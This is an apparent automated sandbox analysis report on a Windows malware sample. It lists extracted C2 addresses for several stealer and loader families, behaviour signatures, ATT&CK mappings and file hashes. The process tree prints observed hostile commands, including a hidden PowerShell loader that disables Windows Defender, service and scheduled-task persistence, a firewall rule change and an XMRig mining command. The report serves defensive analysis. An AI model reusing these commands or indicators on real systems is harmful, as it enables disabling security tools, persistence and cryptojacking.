Analysis

  • max time kernel
    70s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    01-11-2021 10:39

General

  • Target

    c463b07c6e61aeb24a8f3a06dae3bd1c.exe

  • Size

    160KB

  • MD5

    c463b07c6e61aeb24a8f3a06dae3bd1c

  • SHA1

    c8e1aff3d845ef393a58f6c76eab6742fb672cb1

  • SHA256

    acca11a2d0fc746a66b352eec2ebe5f4b48abd4d37f6ff433199f627312c65a0

  • SHA512

    884375c632309f1152a8bff0295023c0f3990bc7d1fd91d00c4d7e65c2540763376fd7881ebf12778ea8ace3dbdb36176a5b0f40da4c33d668086cae6c5c3e75

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://honawey70.top/

http://wijibui00.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

http://193.56.146.214/

https://193.56.146.214/

rc4.i32
rc4.i32
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

Botnet

V5

C2

185.183.32.161:45391

Extracted

Family

redline

Botnet

SuperStar

C2

185.215.113.29:36224

Extracted

Family

raccoon

Botnet

8dec62c1db2959619dca43e02fa46ad7bd606400

Attributes
  • url4cnc

    http://telegin.top/capibar

    http://ttmirror.top/capibar

    http://teletele.top/capibar

    http://telegalive.top/capibar

    http://toptelete.top/capibar

    http://telegraf.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

123123123

C2

93.115.20.139:28978

Extracted

Family

raccoon

Botnet

68e2d75238f7c69859792d206401b6bde2b2515c

Attributes
  • url4cnc

    http://telegalive.top/agrybirdsgamerept

    http://toptelete.top/agrybirdsgamerept

    http://telegraf.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

a8df9e1d3d24b04502963590a8ed392d88ab1b96

Attributes
  • url4cnc

    http://telegin.top/opticillusionlusy

    http://ttmirror.top/opticillusionlusy

    http://teletele.top/opticillusionlusy

    http://telegalive.top/opticillusionlusy

    http://toptelete.top/opticillusionlusy

    http://telegraf.top/opticillusionlusy

    https://t.me/opticillusionlusy

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.6

Botnet

936

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    936

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • BitRAT Payload 3 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • XenArmor Suite

    XenArmor is as suite of password recovery tools for various application.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 19 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 11 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c463b07c6e61aeb24a8f3a06dae3bd1c.exe
    "C:\Users\Admin\AppData\Local\Temp\c463b07c6e61aeb24a8f3a06dae3bd1c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3704
    • C:\Users\Admin\AppData\Local\Temp\c463b07c6e61aeb24a8f3a06dae3bd1c.exe
      "C:\Users\Admin\AppData\Local\Temp\c463b07c6e61aeb24a8f3a06dae3bd1c.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:724
  • C:\Users\Admin\AppData\Local\Temp\17F9.exe
    C:\Users\Admin\AppData\Local\Temp\17F9.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4568
    • C:\Users\Admin\AppData\Local\Temp\17F9.exe
      C:\Users\Admin\AppData\Local\Temp\17F9.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4420
  • C:\Users\Admin\AppData\Local\Temp\1C8D.exe
    C:\Users\Admin\AppData\Local\Temp\1C8D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4444
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dnnvnfit\
      2⤵
        PID:1020
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\abzjmfkv.exe" C:\Windows\SysWOW64\dnnvnfit\
        2⤵
          PID:1676
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create dnnvnfit binPath= "C:\Windows\SysWOW64\dnnvnfit\abzjmfkv.exe /d\"C:\Users\Admin\AppData\Local\Temp\1C8D.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2496
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description dnnvnfit "wifi internet conection"
            2⤵
              PID:2824
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start dnnvnfit
              2⤵
                PID:4240
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:4980
              • C:\Users\Admin\AppData\Local\Temp\2558.exe
                C:\Users\Admin\AppData\Local\Temp\2558.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3192
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\mannishly.bat" "
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:588
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bifurcation.exe
                    bifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3500
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\beadroll.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\beadroll.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1276
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                        5⤵
                          PID:5076
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                          5⤵
                            PID:3040
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1276 -s 1688
                            5⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5112
                  • C:\Users\Admin\AppData\Local\Temp\27BB.exe
                    C:\Users\Admin\AppData\Local\Temp\27BB.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:4580
                  • C:\Users\Admin\AppData\Local\Temp\2C40.exe
                    C:\Users\Admin\AppData\Local\Temp\2C40.exe
                    1⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:4392
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                      2⤵
                        PID:3760
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 488
                        2⤵
                        • Suspicious use of NtCreateProcessExOtherParentProcess
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5032
                    • C:\Users\Admin\AppData\Local\Temp\324C.exe
                      C:\Users\Admin\AppData\Local\Temp\324C.exe
                      1⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:808
                    • C:\Users\Admin\AppData\Local\Temp\3A2D.exe
                      C:\Users\Admin\AppData\Local\Temp\3A2D.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2144
                      • C:\Users\Admin\AppData\Local\Temp\3A2D.exe
                        C:\Users\Admin\AppData\Local\Temp\3A2D.exe
                        2⤵
                        • Executes dropped EXE
                        PID:4956
                    • C:\Windows\SysWOW64\dnnvnfit\abzjmfkv.exe
                      C:\Windows\SysWOW64\dnnvnfit\abzjmfkv.exe /d"C:\Users\Admin\AppData\Local\Temp\1C8D.exe"
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2948
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:1252
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2980
                    • C:\Users\Admin\AppData\Local\Temp\4941.exe
                      C:\Users\Admin\AppData\Local\Temp\4941.exe
                      1⤵
                      • Executes dropped EXE
                      PID:4964
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 924
                        2⤵
                        • Program crash
                        PID:2736
                    • C:\Users\Admin\AppData\Local\Temp\5CAB.exe
                      C:\Users\Admin\AppData\Local\Temp\5CAB.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:944
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "
                        2⤵
                          PID:2344
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))
                            3⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2232
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\system32\sc.exe" qc windefend
                              4⤵
                                PID:60
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                4⤵
                                  PID:1356
                                • C:\Windows\SysWOW64\whoami.exe
                                  "C:\Windows\system32\whoami.exe" /groups
                                  4⤵
                                    PID:4236
                                  • C:\Windows\SysWOW64\net1.exe
                                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                                    4⤵
                                      PID:3048
                                    • C:\Windows\SysWOW64\net1.exe
                                      "C:\Windows\system32\net1.exe" start lsass
                                      4⤵
                                        PID:2496
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "
                                    2⤵
                                      PID:1684
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))
                                        3⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2348
                                        • C:\Windows\SysWOW64\sc.exe
                                          "C:\Windows\system32\sc.exe" qc windefend
                                          4⤵
                                            PID:664
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                            4⤵
                                              PID:2880
                                            • C:\Windows\SysWOW64\whoami.exe
                                              "C:\Windows\system32\whoami.exe" /groups
                                              4⤵
                                                PID:2236
                                              • C:\Windows\SysWOW64\net1.exe
                                                "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                4⤵
                                                  PID:3104
                                                • C:\Windows\SysWOW64\net1.exe
                                                  "C:\Windows\system32\net1.exe" start lsass
                                                  4⤵
                                                    PID:2800
                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2172
                                                • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2816
                                                  • C:\Users\Admin\AppData\Local\Temp\b1DjvlOwAYDdmx6u.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\b1DjvlOwAYDdmx6u.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2020
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                      5⤵
                                                      • Creates scheduled task(s)
                                                      PID:2116
                                                  • C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe
                                                    -a "C:\Users\Admin\AppData\Local\a4755c5f\plg\LnxGuN2p.json"
                                                    4⤵
                                                      PID:4628
                                                      • C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe
                                                        -a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
                                                        5⤵
                                                          PID:4960
                                                  • C:\Users\Admin\AppData\Roaming\fontdrvhost.exe
                                                    "C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:3432
                                                • C:\Users\Admin\AppData\Local\Temp\6140.exe
                                                  C:\Users\Admin\AppData\Local\Temp\6140.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:3220
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                  1⤵
                                                    PID:3164
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      "C:\Windows\system32\sc.exe" qc windefend
                                                      2⤵
                                                        PID:4660
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                        2⤵
                                                          PID:3664
                                                        • C:\Windows\SysWOW64\whoami.exe
                                                          "C:\Windows\system32\whoami.exe" /groups
                                                          2⤵
                                                            PID:1008
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            "C:\Windows\system32\net1.exe" stop windefend
                                                            2⤵
                                                              PID:2832
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                              2⤵
                                                                PID:4652
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                              1⤵
                                                                PID:3116
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  "C:\Windows\system32\sc.exe" qc windefend
                                                                  2⤵
                                                                    PID:4492
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                    2⤵
                                                                      PID:1916
                                                                    • C:\Windows\SysWOW64\whoami.exe
                                                                      "C:\Windows\system32\whoami.exe" /groups
                                                                      2⤵
                                                                        PID:4648
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        "C:\Windows\system32\net1.exe" stop windefend
                                                                        2⤵
                                                                          PID:3612
                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                          "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                          2⤵
                                                                            PID:1836
                                                                        • C:\Users\Admin\AppData\Local\Temp\51BB.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\51BB.exe
                                                                          1⤵
                                                                            PID:2988
                                                                            • C:\Users\Admin\AppData\Local\Temp\51BB.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\51BB.exe
                                                                              2⤵
                                                                                PID:1672
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1988
                                                                            • C:\Users\Admin\AppData\Local\Temp\55A4.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\55A4.exe
                                                                              1⤵
                                                                                PID:4592
                                                                              • C:\Users\Admin\AppData\Local\Temp\5920.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5920.exe
                                                                                1⤵
                                                                                  PID:4312
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1612
                                                                                    2⤵
                                                                                    • Program crash
                                                                                    PID:2132
                                                                                • C:\Users\Admin\AppData\Local\Temp\68E0.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\68E0.exe
                                                                                  1⤵
                                                                                    PID:2520
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:3364
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                        PID:3968
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:2756
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:564
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                              PID:1332
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                              1⤵
                                                                                                PID:496
                                                                                              • C:\Users\Admin\AppData\Local\Temp\F6F8.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\F6F8.exe
                                                                                                1⤵
                                                                                                  PID:3212

                                                                                                Network

                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                Execution

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Persistence

                                                                                                New Service

                                                                                                1
                                                                                                T1050

                                                                                                Modify Existing Service

                                                                                                1
                                                                                                T1031

                                                                                                Registry Run Keys / Startup Folder

                                                                                                2
                                                                                                T1060

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Privilege Escalation

                                                                                                New Service

                                                                                                1
                                                                                                T1050

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Defense Evasion

                                                                                                Disabling Security Tools

                                                                                                1
                                                                                                T1089

                                                                                                Modify Registry

                                                                                                3
                                                                                                T1112

                                                                                                Virtualization/Sandbox Evasion

                                                                                                1
                                                                                                T1497

                                                                                                Credential Access

                                                                                                Credentials in Files

                                                                                                2
                                                                                                T1081

                                                                                                Discovery

                                                                                                Query Registry

                                                                                                4
                                                                                                T1012

                                                                                                Virtualization/Sandbox Evasion

                                                                                                1
                                                                                                T1497

                                                                                                System Information Discovery

                                                                                                4
                                                                                                T1082

                                                                                                Peripheral Device Discovery

                                                                                                1
                                                                                                T1120

                                                                                                Collection

                                                                                                Data from Local System

                                                                                                2
                                                                                                T1005

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                  MD5

                                                                                                  54e9306f95f32e50ccd58af19753d929

                                                                                                  SHA1

                                                                                                  eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                  SHA256

                                                                                                  45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                  SHA512

                                                                                                  8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                  MD5

                                                                                                  0e86fb2740f4c436b6952069342af3fe

                                                                                                  SHA1

                                                                                                  41eeb376870f56af3b9d17415c7d6df53de60adb

                                                                                                  SHA256

                                                                                                  f1f796632ce65b764d2afb6027b72bcf919345fc1035964fcdbcae87b4a2210c

                                                                                                  SHA512

                                                                                                  a075393c1363c31c10be31e36b89ae5a8acef0fd8af59b86785dae2fd4a9eacc6e8752975970c29aa12036b1d848cbba52a1c9b99bc18f92bd3382fb048f8987

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                  MD5

                                                                                                  b751492c41c6f3173d3b6f31c1b9b4eb

                                                                                                  SHA1

                                                                                                  abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

                                                                                                  SHA256

                                                                                                  ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

                                                                                                  SHA512

                                                                                                  afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  MD5

                                                                                                  c2d06c11dd1f1a8b1dedc1a311ca8cdc

                                                                                                  SHA1

                                                                                                  75c07243f9cb80a9c7aed2865f9c5192cc920e7e

                                                                                                  SHA256

                                                                                                  91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

                                                                                                  SHA512

                                                                                                  db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  MD5

                                                                                                  c2d06c11dd1f1a8b1dedc1a311ca8cdc

                                                                                                  SHA1

                                                                                                  75c07243f9cb80a9c7aed2865f9c5192cc920e7e

                                                                                                  SHA256

                                                                                                  91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

                                                                                                  SHA512

                                                                                                  db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  MD5

                                                                                                  643850ee5ada1d9f1bd5e1e441f18550

                                                                                                  SHA1

                                                                                                  0b5d5528bd1c26ba45eec677d91c53afee8f644d

                                                                                                  SHA256

                                                                                                  679a53527a9a5c52f1248cd79ebd3c24209c5f74bb67f5851aae88e09ce39c3b

                                                                                                  SHA512

                                                                                                  8e2c3a915df68ed496486921fac49573f79890692f6b245945ab9c67209ab897dc9cbe0abd86c8be1efc66b5c99fb56b766cd09eaf2f5e15c24e9439843c3dab

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  MD5

                                                                                                  643850ee5ada1d9f1bd5e1e441f18550

                                                                                                  SHA1

                                                                                                  0b5d5528bd1c26ba45eec677d91c53afee8f644d

                                                                                                  SHA256

                                                                                                  679a53527a9a5c52f1248cd79ebd3c24209c5f74bb67f5851aae88e09ce39c3b

                                                                                                  SHA512

                                                                                                  8e2c3a915df68ed496486921fac49573f79890692f6b245945ab9c67209ab897dc9cbe0abd86c8be1efc66b5c99fb56b766cd09eaf2f5e15c24e9439843c3dab

                                                                                                • C:\Users\Admin\AppData\Local\Temp\17F9.exe
                                                                                                  MD5

                                                                                                  282ec34432eab46ceaa2fb0f826d767b

                                                                                                  SHA1

                                                                                                  110b7cebdce133c3ac5994568824a696fc5128b9

                                                                                                  SHA256

                                                                                                  3a666dd93ae79da27b293f1b3ff04ea93ff8ceb54e44534bf5b80290e56bf1c9

                                                                                                  SHA512

                                                                                                  457473dc88d786083ea51889a234797024a32f48bf9b77b66177e04f4c0955bcf2eed0f6320f1b795cc6762d010d673f3c75f369a80b6360b93dcca9501be1ef

                                                                                                • C:\Users\Admin\AppData\Local\Temp\17F9.exe
                                                                                                  MD5

                                                                                                  282ec34432eab46ceaa2fb0f826d767b

                                                                                                  SHA1

                                                                                                  110b7cebdce133c3ac5994568824a696fc5128b9

                                                                                                  SHA256

                                                                                                  3a666dd93ae79da27b293f1b3ff04ea93ff8ceb54e44534bf5b80290e56bf1c9

                                                                                                  SHA512

                                                                                                  457473dc88d786083ea51889a234797024a32f48bf9b77b66177e04f4c0955bcf2eed0f6320f1b795cc6762d010d673f3c75f369a80b6360b93dcca9501be1ef

                                                                                                • C:\Users\Admin\AppData\Local\Temp\17F9.exe
                                                                                                  MD5

                                                                                                  282ec34432eab46ceaa2fb0f826d767b

                                                                                                  SHA1

                                                                                                  110b7cebdce133c3ac5994568824a696fc5128b9

                                                                                                  SHA256

                                                                                                  3a666dd93ae79da27b293f1b3ff04ea93ff8ceb54e44534bf5b80290e56bf1c9

                                                                                                  SHA512

                                                                                                  457473dc88d786083ea51889a234797024a32f48bf9b77b66177e04f4c0955bcf2eed0f6320f1b795cc6762d010d673f3c75f369a80b6360b93dcca9501be1ef

                                                                                                • C:\Users\Admin\AppData\Local\Temp\1C8D.exe
                                                                                                  MD5

                                                                                                  604abe830d82fd7209ef3367edac30d7

                                                                                                  SHA1

                                                                                                  f3754deb19e129c9f6d45462d0d18e3915780c8a

                                                                                                  SHA256

                                                                                                  14ef7f3bbea5ed37f68b621108c1af7eb95a6e884ea4419c6da2b7ed4b82b909

                                                                                                  SHA512

                                                                                                  adffc408dcaba3932029e55529e1d6af8f5b3015becc0d79a00955d1b42971438e61b818f3febcc473c9c7bfab9ccd27d64a3fef7be574d64078ca117b5dc4f9

                                                                                                • C:\Users\Admin\AppData\Local\Temp\1C8D.exe
                                                                                                  MD5

